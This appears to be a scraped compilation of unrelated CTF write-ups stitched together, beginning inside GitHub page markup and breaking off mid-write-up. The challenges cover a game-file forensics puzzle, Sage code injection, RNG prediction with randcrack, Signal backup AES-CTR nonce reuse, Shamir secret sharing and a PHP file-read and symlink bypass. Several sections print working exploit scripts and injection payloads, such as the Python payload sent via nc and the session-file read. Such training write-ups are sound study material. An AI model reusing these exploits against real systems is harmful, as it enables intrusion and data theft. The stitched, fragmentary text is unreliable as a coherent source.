<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>u3.png</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
<readme-toc>
<div id="readme" class="Box MD js-code-block-container js-code-nav-container js-tagsearch-file Box--responsive" data-tagsearch-path="X-MAS_CTF_2021/Underground Forensics/README.MD" data-tagsearch-lang="Markdown">
<div class="d-flex js-sticky js-position-sticky top-0 border-top-0 border-bottom p-2 flex-items-center flex-justify-between color-bg-default rounded-top-2" style="position: sticky; z-index: 30;" > <div class="d-flex flex-items-center"> <details data-target="readme-toc.trigger" data-menu-hydro-click="{"event_type":"repository_toc_menu.click","payload":{"target":"trigger","repository_id":352459850,"originating_url":"https://github.com/K1nd4SUS/CTF-Writeups/tree/main/X-MAS_CTF_2021/Underground%20Forensics","user_id":null}}" data-menu-hydro-click-hmac="354075faa547252ae9d1907872d23bf8f79dbad440f04745b8102a43bc0662dd" class="dropdown details-reset details-overlay"> <summary class="btn btn-octicon m-0 mr-2 p-2" aria-haspopup="true" aria-label="Table of Contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-list-unordered"> <path d="M5.75 2.5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5ZM2 14a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm1-6a1 1 0 1 1-2 0 1 1 0 0 1 2 0ZM2 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg> </summary>
<details-menu class="SelectMenu" role="menu"> <div class="SelectMenu-modal rounded-3 mt-1" style="max-height:340px;">
<div class="SelectMenu-list SelectMenu-list--borderless p-2" style="overscroll-behavior: contain;"> Underground Forensics Description Solution FLAG >>X-MAS{1_am_R0ck_123127cy13a} </div> </div> </details-menu></details>
<h2 class="Box-title"> README.MD </h2> </div> </div>
<div data-target="readme-toc.content" class="Box-body px-5 pb-5"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1 tabindex="-1" dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Underground Forensics</h1><h2 tabindex="-1" dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description</h2><div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="[Incoming SMS Message]From: RachelSubject: New File
Hey! I found this on my old hard drive. Files like these have been roaming the streets for almost two decades now, but this one seems to be broken in some way... Do you think you can bring it back to life?">[Incoming SMS Message]From: RachelSubject: New File
Hey! I found this on my old hard drive. Files like these have been roaming the streets for almost two decades now, but this one seems to be broken in some way... Do you think you can bring it back to life?</div><h2 tabindex="-1" dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h2>Firstly, a special thanks to @MΛRC02U1F4A4Let's start with this challenge. We receive a .bin file. I decide to use binwalk to understand what kind of data this file represents. As a result, we initially think it is an LZMA corrupt archive, because of a part of a file that resembles an LZMA header, thanks to a 5D byte. This could be a good path since the beginning of the file was too much sus:But, we are wrong. In fact, by consulting the content of the file with a Hex Editor (Ghex and HxD), we find that there are a lot of interesting JDLZ keywords.By searching some information online, we understand that JDLZ is an Electronic Arts compression/decompression algorithm.Moreover, we understand that that's a bin file related to Need For Speed underground 2 thanks to the challenge description. Rachel is an NFS U2 character, and in particular, the configuration file must be related to a car, since the file has been roaming the streets.In addition to that, 3.000GT resembles the name of the Mitsubishi 3000GT, a vehicle exclusively included in underground 2.At this point, this one must be the right path. For this, @MΛRC02U1F4A4 gave me some bin files taken from the 3000GT NFS game folder, in particular, TEXTURE.BIN and GEOMETRY.BIN.The idea is to fix the header of the file, to open it in some ways and read the content. For this, we've found NFS carToolkit, which is the most suitable software for NFS modding.As expected, by trying to open the given bin file with this software, it doesn't open it. By opening an original game file, we would see all the textures or geometries of the given car.After too many hours, we understand that we should just change the magic bytes of the bin file, whose function is to define what kind of file we are working with. We try the TEXTURE.BIN magic bytes, nothing. The toolkit can't understand what's the game version. But, by replacing the lmao with the GEOMETRY.BIN magic bytes, the file gets opened, and the car model is shown. Here, by disabling some levels, we can find the flag:<h4 tabindex="-1" dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>FLAG >> X-MAS{1_am_R0ck_123127cy13a}</h4></article> </div> </div>
Firstly, a special thanks to @MΛRC02U1F4A4
Let's start with this challenge. We receive a .bin file. I decide to use binwalk to understand what kind of data this file represents. As a result, we initially think it is an LZMA corrupt archive, because of a part of a file that resembles an LZMA header, thanks to a 5D byte. This could be a good path since the beginning of the file was too much sus:
But, we are wrong. In fact, by consulting the content of the file with a Hex Editor (Ghex and HxD), we find that there are a lot of interesting JDLZ keywords.
By searching some information online, we understand that JDLZ is an Electronic Arts compression/decompression algorithm.Moreover, we understand that that's a bin file related to Need For Speed underground 2 thanks to the challenge description. Rachel is an NFS U2 character, and in particular, the configuration file must be related to a car, since the file has been roaming the streets.In addition to that, 3.000GT resembles the name of the Mitsubishi 3000GT, a vehicle exclusively included in underground 2.
At this point, this one must be the right path. For this, @MΛRC02U1F4A4 gave me some bin files taken from the 3000GT NFS game folder, in particular, TEXTURE.BIN and GEOMETRY.BIN.
The idea is to fix the header of the file, to open it in some ways and read the content. For this, we've found NFS carToolkit, which is the most suitable software for NFS modding.
As expected, by trying to open the given bin file with this software, it doesn't open it. By opening an original game file, we would see all the textures or geometries of the given car.
After too many hours, we understand that we should just change the magic bytes of the bin file, whose function is to define what kind of file we are working with. We try the TEXTURE.BIN magic bytes, nothing. The toolkit can't understand what's the game version. But, by replacing the lmao with the GEOMETRY.BIN magic bytes, the file gets opened, and the car model is shown. Here, by disabling some levels, we can find the flag:
</readme-toc>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
The following sage file is given. It appears to want us to find a counterexample to the RiemannHypothesis, one of the math problems included in the [MilleniumPrizes](https://www.claymath.org/millennium-problems/riemann-hypothesis). It can surmised we're notsupposed to actually find a counterexample.
```python#!/usr/bin/env sageimport re
if sys.version_info.major < 3: print('nope nope nope nope | https://hxp.io/blog/72') exit(-2)
rx = re.compile(r'Dear Bernhard: Your conjecture is false, for ([^ ]{,40}) is a counterexample\.')
s = CC.to_prec(160)(rx.match(input()).groups()[0])
r = round(s.real())assert not all((s==r, r<0, r%2==0)) # boring
assert not s.real() == 1/2 # boring
assert zeta(s) == 0 # uhm okprint(open('flag.txt').read().strip())```
Furthermore, the [link](https://hxp.io/blog/72) printed when Python 2 is detected also gives us aclue that we may need to look for an arbitrary Python code evaluation sink.
Experimenting with `CC.to_prec(160)` shows that it converts strings to complex fields.
```consolesage: CC.to_prec(160)("1.0")1.0000000000000000000000000000000000000000000000```
It appears to perform arithmetic and attempt to resolve Python symbols.
```consolesage: CC.to_prec(160)("1 + 1")2.0000000000000000000000000000000000000000000000sage: CC.to_prec(160)("A").../var/tmp/sage-9.4-current/local/lib/python3.9/site-packages/sage/all.py in <module>
NameError: name 'A' is not defined```
Attempting some Python code results in it actually executing.
```consolesage: CC.to_prec(160)("print('hello world')")helloworldNaN + NaN*Isage:```
Thus, the flag read code can be simply provided to obtain the flag:
```console$ nc 65.108.178.230 7904Dear Bernhard: Your conjecture is false, for print(open('flag.txt').read().strip()) is a counterexample.hxp{0NE_M1LL10N_D0LLAR5}```
**Flag:** `hxp{0NE_M1LL10N_D0LLAR5}`
Full writeup at: [https://nandynarwhals.org/hxp-ctf-2021-brieman/](https://nandynarwhals.org/hxp-ctf-2021-brieman/) |
This challenge presents a web page where you can play a diferent kind of bingo, after analysing the source codewe can understand 2 diferent endpoints /generate and /check
After some basic requests we can see that /generate returns a number and that check let's us check if a guess is the last number generated.
With the information on the web page it seems that we need to guess 10 numbers in a row, no way this can be done just by guessing or brute force.
This is where the randcrack module comes in https://github.com/tna0y/Python-random-module-cracker
This module let's us input numbers generated by a random number renerator in python and after 624 numbers it can guess the next ones.
This small python codes exemplifies the solution
```import random, timeimport requestsfrom randcrack import RandCrack
random.seed(time.time())
rc = RandCrack()s = requests.Session()
for i in range(624): data = {"attempt": "191919199"} url = "http://localhost:80/generate" response = s.get(url) url = "http://localhost:80/check" response = s.post(url,json=data) print("Result: {}".format(response.json())) rc.submit(int(response.json()['ANSWER']))
for i in range(10): data = {"attempt": rc.predict_randrange(0, 4294967295)} url = "http://localhost:80/generate" response = s.get(url) url = "http://localhost:80/check" response = s.post(url,json=data) print("Result: {}".format(response.json()))``` |
# caBalS puking
Challenge description:
> Hey, did you hear the good news? We were finally able to get ADB access to kirschju’s phone. All we could find on the file system were two Signal backup files, though. Nevertheless, with hxp’s ever-delayed challenge development process, there is hope that we might find a flag in the backup.
> The first backup coincides closely with the registration time of the target Signal account, so we believe it represents the state of an empty account. The second backup file is a lot larger, for sure there’s some valuable piece of information in there.
> We’re also attaching the Signal app retrieved from the phone for your reference, but it doesn’t seem to be modified compared to a vanilla app.
Looking at [the challenge files](https://raw.githubusercontent.com/NicolaiSoeborg/ctf-writeups/master/2021/hxp%202021/caBalS%20puking/caBalS%20puking-2672391a1b33417f.tar.xz) we get;
* `signal-2021-11-29-22-02-26.backup` ("initial database") * `signal-2021-11-30-00-18-47.backup` ("database w/ flag") * `Signal.apk`
## Analysing backup files
We found this great tool to decrypt Signal backups:
<https://github.com/mossblaser/signal_for_android_decryption>
We used this tool to analyse and understand the two backups.
```pythoninitialisation_vector, salt = read_backup_header(backup_file)cipher_key, hmac_key = derive_keys(passphrase, salt)```
The header is a `BackupFrame`-without MAC (more on that later)
The passphrase is split into a cipher key and a MAC key by first doing 250000-rounds of SHA512 stretching and then splitting into two 32 bytes keys using SHA256-HKDF.We don't know the key and the key is auto-generated by Signal when creating a backup, so we can't attack these keys.
Normally a backup from Signal is a completely new, full dump, of the database with a random IV and salt, but the two files we get has the same IV and salt (!)
```IV = 87166ab8af3c58629ff5c5eb5b471ebcsalt = 0e6621b28a618a652893e84299b8fc8204e80f0a3a00d612c31a8cb890f9f8e9```
The encryption primitive is [AES-CTR](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Counter_(CTR)), so this is _just_ a simple IV reuse attack!
To attack it we can take any known part of the initial database, XOR that with the encrypted initial database (to get the keystream "at that point") and then XOR that with the corresponding point in the database that has the flag. I.e:
``` known_pt ^ initial_ct ^ flag_ct => flag_pt[_____ keystream _____]```
So we need to fulfill the following two assumptions:
> We can find known _cribs_ in the ciphertext and their offsets
E.g. it always starts/ends with a header/footer with known bytes)
> The offsets will be shifted or the two ciphertexts will differ at the offset
If the two ciphertext is identical at a specific offset and we _guess_ the plaintext at that offset in the "initial backup", then we are not attacking Counter Mode at that offset -- we are guessing and learning nothing new.
Instead what we hope happens is that some some parts partially overlap, which means we will get a partial plaintext and because the underlying plaintext is protobuf and SQLite we might be able to predict more bytes given the partial plaintext. We can then use that newly predicted plaintext to recover more of the initial database, and so forth.
So lets dig into the raw bytes so we can start the known-plaintext attack.
## Signal Backup Format (for Android)
The Signal `.backup` consist of multiple _chunks_.
Chunks without attachments has the following structure:
| **Length** | 4 | size - 10 | 10 ||-------------|------|-------------|-----|| **Content** | size | BackupFrame | MAC |
With `size` being a big-endian number and MAC is a HMAC-SHA256 using `hmac_key`.
The field `BackupFrame` is the AES-CTR encrypted protobuf using the "global" IV.Note: that the IV is increased after both every BackupFrame and Payload-chunk.
A BackupFrame-protobuf structure can contain multiple types, e.g. SqlStatement (`INSERT INTO sms ...`), KeyValue-pairs, Preference, etc, but also a "out of protobuf payload" for Attachment, Sticker and Avatars.
For the first types, the raw data will be inside the protobuf structure.For big data types the struct will contain a "has payload = true" field and a size of the payload.
| **Length** | (defined in parent BackupFrame) | 10 ||-------------|---------------------------------|-----|| **Content** | Payload | MAC |
We can map the structure of the initial database by simply parsing the first 4-byte length field and then skipping that many bytes (to seek to the next BackupFrame header).This works very well for the first 87 BackupFrames as these has no payloads, but at offset 0x45c0 we find something which is too big to be the length of a BackupFrame.
### Payloads in initial database
So which payloads are stored in the initial (empty) database? ... Stickers of course!
Almost all of the file size of the empty backup is due to the 78 default stickers.
So back to the initial problem, how do we know which sticker is starting at offset 0x45c0?Solution: decrypt all of the default stickers from your own Signal database and find the lengths of them, then for each length try to move the file pointer that amount and see if the next chunk looks like a `BackupFrame` header (i.e. starts with `\x00\x00` due to the BackupFrame being small).
We implemented this in [`find-stickers.py`](https://raw.githubusercontent.com/NicolaiSoeborg/ctf-writeups/master/2021/hxp%202021/caBalS%20puking/find-stickers.py) looking from the bottom of the file and waiting for 4 bytes that points the the last known "good offset".
The script quickly finds a single solution where each sticker is used exactly once and all of the file is either mapped to a BackupFrame or a payload matching a default sticker.
Because the initial database and the database with the flag diverge, we get a sticker overlapping the flag!
I.e. we have something similar to the following structure:
| Initial Backup | Flag Backup ||----------------|-------------------------|| std settings | std settings || Sticker 1 | `INSERT INTO mms(...)` || Sticker 2 | Sticker 1 || Sticker _n_ | Sticker 2 || _EOF_ | Sticker _n_ || | EOF |
Now we are back to the trivial nonce reuse attack, just needing to carefully align the `sticker plaintext` XOR `initial db at sticker offset` XOR `flag db at counter offset` and we get a decrypted chunk of the flag DB.
A big shout out to all the teammates in Kalmarunionen bringing useful insights (killerdog, andyandpandy, eevee, etc), and of course hxp for making the challenge.
Flag: `hxp{f0rmattin5+crypt0=<3}` |
This challenge was a cool introduction to Shamir Secret Sharing (SSS).
### msg.enc
```share: (21202245407317581090, 11086299714260406068)coefficient: 93526756371754197321930622219489764824secret message: 1aaad05f3f187bcbb3fb5c9e233ea339082062fc10a59604d96bcc38d0af92cd842ad7301b5b72bd5378265dae0bc1c1e9f09a90c97b35cfadbcfe259021ce495e9b91d29f563ae7d49b66296f15e7999c9e547fac6f1a2ee682579143da511475ea791d24b5df6affb33147d57718eaa5b1b578230d97f395c458fc2c9c36525db1ba7b1097ad8f5df079994b383b32695ed9a372ea9a0eb1c6c18b3d3d43bd2db598667ef4f80845424d6c75abc88b59ef7c119d505cd696ed01c65f374a0df3f331d7347052faab63f76f587400b6a6f8b718df1db9cebe46a4ec6529bc226627d39baca7716a4c11be6f884c371b08d87c9e432af58c030382b737b9bb63045268a18455b9f1c4011a984a818a5427231320ee7eca39bdfe175333341b7c```
## OverviewWe are given some parameters : `p = 92434467187580489687 , k = 10 , n = 18`
At first glance, we can see that the coefficients array (**coeffs**) is initialized with a random secret value, say **s**. `self.coeffs = [self.secret]`
This value is later used as seed to generate the random AES key which is used to encrypt the flag.
-----
The coeffs array contain repeated md5 hashes of the initial secret value. Of course this hash is converted to an integer. That is:
- element 0 : secret = s- element 1 : md5(secret) = hs- element 2 : md5(md5(secret)) = hhs ...
and so on and so forth. This repeats `n = 18` times.
By the end of `create_pol` **coeffs** will contain only the first `k=10` hash values because of `self.coeffs = self.coeffs[:self.k]`.
The important part are the two arrays, `x_vals` and `y_vals`.
**x** is just some random value `< p` but **y** is calculated based on the corresponding x value and the coefficients array as below:
`y = (s + hs * x + hhs * x^2 + hhhs * x^3 + ... + hhhhhhhhhs * x^9) % p (1)`
## Solution
We are given the md5 hash of the secret value. That means that we can hash it, then hash again and again to recover all the coefficients but the secret.
We know all the hash values and just one pair of `x, y` values. Let's solve (1) for the secret:
```secret = (y - hs * x - hhs * x^2 - hhhs * x^3 - ... - hhhhhhhhhs * x^9) % p = = [y - (hs * x + hhs * x^2 + hhhs * x^3 + ... + hhhhhhhhhs * x^9)] % p```
Now we can subtitute for the coefficients that we calculated above, the x and y value to get the secret, find the key and decrypt the flag.
## solve.py```from hashlib import md5from Crypto.Cipher import AESfrom Crypto.Util.Padding import padfrom random import randbytes, seed
x, y = 21202245407317581090, 11086299714260406068hs = 93526756371754197321930622219489764824k = 10n = 18p = 92434467187580489687coeffs = [hs]
ct = bytes.fromhex('redacted_for_the_sake_of_brevity')
def next_coeff(val): return int(md5(val.to_bytes(32, byteorder="big")).hexdigest(),16)
def calc_coeffs(): for i in range(1, k-1): coeffs.append(next_coeff(coeffs[i-1]))
def calc_rhs(): sum = 0 for i in range(len(coeffs)): sum += coeffs[i] * x**(i+1) return sum % p
calc_coeffs()rhs = calc_rhs()
secret = y - rhssecret %= p
seed(secret)key = randbytes(16)cipher = AES.new(key, AES.MODE_ECB)flag = cipher.decrypt(ct)
print(flag)``` |
# MetaCTF 2021## There Are No Strings on Me (100pts)### Description: >We've got this program that's supposed to check a password, and we're not quite sure how it works. Could you take a look at it and see about finding the password it's looking for?### Provided Files:>[download](https://github.com/team23ctf/writeups/blob/main/metactf2021/There%20Are%20No%20Strings%20on%20Me/strings)
### Step 1 - Identify File:When downloading CTF files, there are a couple of things that should be done. First, `file` should be ran to determine what kind of file it is.
Now that we know it's an executable, we could `chmod +x` and start running it, but there is more information we should gather before doing so.
### Step 2 - Run Strings:Strings is another critical command-line tool that can be used to print human-readable information. Although this is a compiled binary, we may still be able to get information out of the file.
Sure enough, we can see a flag, as well as various function names and calls. Now we can `chmod +x` and verify that this actually works with the program.
This verifies that the 'password' is correct and we have the right flag.
<details> <summary> Flag Spoiler </summary> MetaCTF{this_is_the_most_secure_ever}</details></details>
## Learning TakeawaysWe learned about the string command and how various information can be found in compiled binaries using the command. This is why many challenges host a flag on a remote host, to make it more challenging to receive. Anything compiled with the name of the flag will be displayed with strings! |
# unzipper
**Category**: web \**Difficulty**: medium \**Points**: 172 points (49 solves) \**Author**: hlt
Here, let me unzip that for you.
Download: [unzipper.tar.xz](unzipper.tar.xz)
Connection: http://65.108.176.76:8200/
## Overview
Another small challenge:
```php Solved with Youssef
First notice that we can use the `PHPSESSID` cookie and read our `$_SESSION` data from `/var/lib/php/sessions/`. This allows us to get `$sandbox`:
```pythonimport requestsimport os
url = "http://65.108.176.76:8200"
s = requests.Session()res = s.get(url)sess_id = s.cookies["PHPSESSID"]print(f"[+] PHPSESSID = {sess_id}")
res = s.get(f"{url}/?file=/var/lib/php/sessions/sess_{sess_id}")sandbox = res.text.split(":")[-1].split(";")[0][1:-1]print(f"[+] sandbox = {sandbox}")```
```[+] PHPSESSID = t7fl8v188kg8gd0ai3c3be0qq1[+] sandbox = 29eca32e80f80d0230f27ddcb3a90377```
Next I tried uploading a symlink to `/flag.txt` inside a zip and reading the symlink using `http://65.108.176.76:8200/?file=/var/www/html/data/{sandbox}/{symlink}`, but that didn't work because `realpath()` simply resolved the path to `/flag.txt`, which failed the check:
```php if (0 === preg_match('/(^$|flag)/i', realpath($_GET['file']) ?: '')) readfile($_GET['file']);```
At this point Youssef had to idea of using `file://`.
What if we created a zip file with this directory structure?```$ ls --tree file: leak.lnkfile:└── var └── www └── html └── data └── ccf86389404367cb06bab3ba41c71c27 └── leak.lnkleak.lnk -> /flag.txt```
